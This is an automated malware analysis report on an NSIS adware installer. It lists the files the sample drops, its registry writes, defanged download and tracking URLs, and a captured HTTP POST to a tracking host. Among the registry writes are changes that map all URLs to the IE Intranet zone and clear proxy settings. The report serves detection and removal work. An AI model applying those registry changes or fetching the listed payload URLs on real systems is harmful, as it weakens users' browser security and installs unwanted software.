Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4d8e89edd3f45e2148a4a1fb2ce66c31
SHA1: 31ff7b5f6bc76a977526878c0d6c338af43ed6a0
SHA256: 76cc2a526ae7536e119d80cba79db6f0fce08ab08f967dc061a139ea0640189f
SSDeep: 12288:5rBp5UkallMCBw8yIBtp8dbJd5A4AzybJd5A81:59UkalWCTQdbJd5A4AzybJd5A81
Size: 509176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:52:12
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
wajam_validate.exe:1672
The Trojan injects its code into the following process(es):
%original file name%.exe:1812
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\close-btn.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer5.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\CompleteScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (136383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer1.zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseBA.tmp (172080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBB.tmp (164814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB4.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_243_FP_spws243[1].zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfferScreen_235_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\start-bullet.jpg (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wajam_validate[1].exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\installog.txt (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB5.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB9.tmp (152335 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\ExecCmd.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\wajam_validate.exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_v4[1].htm (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\download.jpg (6025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\branding.jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\InstallScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\WelcomeScreen.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer4.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\WS_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer2.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\but1.png (5574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferAssets.zip (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_243.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BI_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer3.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_38.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\OfferScreen_291_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreen_38_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\skip.jpg (2490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBD.tmp (151604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_145.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DSS_IMapplication_mon_NV1_2[1].htm (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\LoadingBar.gif (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_291.html (3745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\click.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\trusted1.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsJSWV6.dll (1886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_145_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB8.tmp (150063 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_235.html (5521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DS_wrapper_details_v2[1].htm (476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.html (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmBC.tmp (148882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB7.tmp (137924 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\unchecked.jpg (444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\output.txt (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\checked.jpg (503 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_243.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_291.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OK (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_145.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\success (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_235.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_38.html.old (0 bytes)
Registry activity
The process wajam_validate.exe:1672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 81 1D 53 43 49 D4 4A 9C A9 20 63 8F 46 64 89"
The process %original file name%.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014080420140805\"
"CachePrefix" = ":2014080420140805:"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CacheLimit" = "8192"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1260053532"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 11 D5 BB 39 B9 CE 75 76 C4 7F F0 BA B8 D9 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013030120130302]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021120130218]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021820130225]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
b9380b0bea8854fd9f93cc1fda0dfeac | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\ExecCmd.dll |
5264f7d6d89d1dc04955cfb391798446 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\GetVersion.dll |
b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\Math.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\System.dll |
7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\UserInfo.dll |
5afd4a9b7e69e7c6e312b2ce4040394a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\blowfish.dll |
134b93f8bd1f82cd2f1b06c878580703 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\inetc.dll |
94ba775c8a1f4d6c9bb1966eddce22b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\manlib.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\nsDialogs.dll |
a056772e31415e022147d5c4ffcfe22a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\nsJSWV6.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\nsisunz.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\registry.dll |
46f5c497f96e733176b010ff0ee56de3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\wajam_validate.exe |
46f5c497f96e733176b010ff0ee56de3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wajam_validate[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
wajam_validate.exe:1672
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\close-btn.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer5.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\CompleteScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (136383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer1.zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseBA.tmp (172080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBB.tmp (164814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB4.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_243_FP_spws243[1].zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfferScreen_235_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\start-bullet.jpg (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wajam_validate[1].exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\installog.txt (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB5.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB9.tmp (152335 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\ExecCmd.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\wajam_validate.exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_v4[1].htm (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\download.jpg (6025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\branding.jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\InstallScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\WelcomeScreen.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer4.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\WS_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer2.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\but1.png (5574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferAssets.zip (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_243.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BI_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer3.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_38.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\OfferScreen_291_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreen_38_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\skip.jpg (2490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBD.tmp (151604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_145.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DSS_IMapplication_mon_NV1_2[1].htm (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\LoadingBar.gif (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_291.html (3745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\click.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\trusted1.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsJSWV6.dll (1886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_145_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB8.tmp (150063 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_235.html (5521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DS_wrapper_details_v2[1].htm (476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.html (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmBC.tmp (148882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB7.tmp (137924 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\unchecked.jpg (444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\output.txt (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\checked.jpg (503 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46304 | c52a72deb0170941d392ec38c6aeafd0 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 298072 | 1024 | 3.32453 | 723ad80df002dc5421798f4307abe5cf |
.ndata | 335872 | 1908736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2244608 | 102848 | 102912 | 3.69799 | 0f65a45d68577e96223f6c630a739884 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://fglasspeast.com/FCL_Co_v4.php | |
hxxp://stsunsetwest.com/DS_wrapper_details_v2.php | |
hxxp://www.wajam.com/download/wajam_validate.exe | |
hxxp://www.wajam.com/install/valid?v=1&unique_id=0630F6DB1811B361E367028BD09FCCEB | |
hxxp://secure.goeastcdncache.com.cdngc.net/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip | |
hxxp://secure.goeastcdncache.com.cdngc.net/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg | |
hxxp://stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php | |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/OfferScreen_243_FP_spws243.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_291_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_38_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_235_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_145_EN.zip | 174.35.73.156 |
hxxp://stsunsetwest.com/DS_trackstats_mon_v2.php | |
hxxp://www.stsunsetwest.com/DS_trackstats_mon_v2.php | 50.19.102.217 |
hxxp://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip | |
hxxp://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip | 174.35.73.156 |
hxxp://www.fglasspeast.com/FCL_Co_v4.php | |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip | 174.35.73.156 |
hxxp://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg | |
hxxp://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php | 50.19.102.217 |
hxxp://www.stsunsetwest.com/DS_wrapper_details_v2.php | 50.19.102.217 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /DS_trackstats_mon_v2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 158
Connection: Keep-Alive
Cache-Control: no-cache
